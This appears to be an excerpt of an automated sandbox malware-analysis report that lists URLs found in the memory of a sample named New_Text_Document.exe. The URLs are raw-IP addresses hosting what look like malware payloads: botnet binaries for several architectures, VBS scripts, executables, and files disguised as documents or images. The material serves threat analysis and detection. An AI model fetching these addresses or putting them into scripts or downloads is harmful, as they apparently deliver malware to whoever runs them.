                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.254.37.196/bins/sora.arm6
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.254.37.196/bins/sora.arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.254.37.196/bins/sora.m68k
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.254.37.196/bins/sora.mips
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.254.37.196/bins/sora.mpsl
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.254.37.196/bins/sora.ppc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.254.37.196/bins/sora.sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.254.37.196/bins/sora.x86
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.254.37.80/HJGHJGHJJGFile.vbs
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.254.37.80/HTMLcache8.dOC
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.254.37.80/Qconngovaq.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.254.37.80/Wuotlbdh.jpg
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.254.37.80/gfhdsggssdgfsFile.vbs
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.254.37.80/sevenththththththth.vbs
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.255.114.16/SbxZTWhYZFiaVflBFzSvO88.bin
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.255.114.16/qyGpdNrI144.bin
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.255.211.66:11211/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.39.181.218:11435/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.81.157.105:555/2.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.81.157.105:555/T.jpg
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.81.157.213:222/9X.jpg
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.81.157.213:222/gen.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.81.157.219:222/1.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.81.157.219:222/2.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.87.43.2:54244/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.115.101.103:57837/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.120.114.44:57413/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.123.77.16:11049/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.158.8.26:29839/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.179.219.164:50360/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.179.253.150:29873/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.179.253.170:63664/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.206.150.208:28173/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.168.125.187:29714/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.189.56.33:55336/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.193.210.224:19602/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.2.27.108:18598/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.235.225.108:15258/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.250.74.61:16002/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.152.181.239:53478/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.158.121.3:21767/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.251.89.161:41625/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.65.41.210:30387/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.65.94.88:64590/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.173.215.52:28244/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.203.214.232:10648/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.47.66.53:34560/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.12.99.194:28516/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.130.128.59:7989/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.144.235.237:51668/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.186.28.35:62930/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.217.82.19:14292/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.220.229.49:12646/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.249.181.153:48084/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.56.136.54:65260/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.57.183.186:33060/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.98.37.200:48046/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.100.27.91:9864/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.187.123.122/1.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.108.47/2114/FF/RBLnetwork.vbs
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.108.47/2114/UBC.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.232.37/windows/IGCC.vbs
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.232.37/windows/winl/HTMLCachesClear.dOC
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.000000000347B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.64.154/windows/HTMLcachesIE.vbs
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.000000000347B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.64.154/windows/HTR.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.000000000347B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.64.154/windows/whs/HTMLcacheIEsession.dOC
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.95.131/250/HTML.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.95.131/260/HTML.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.95.131/270/HTMLc.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.95.131/280/HTMLC.EXE
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.53.122.30/arm7
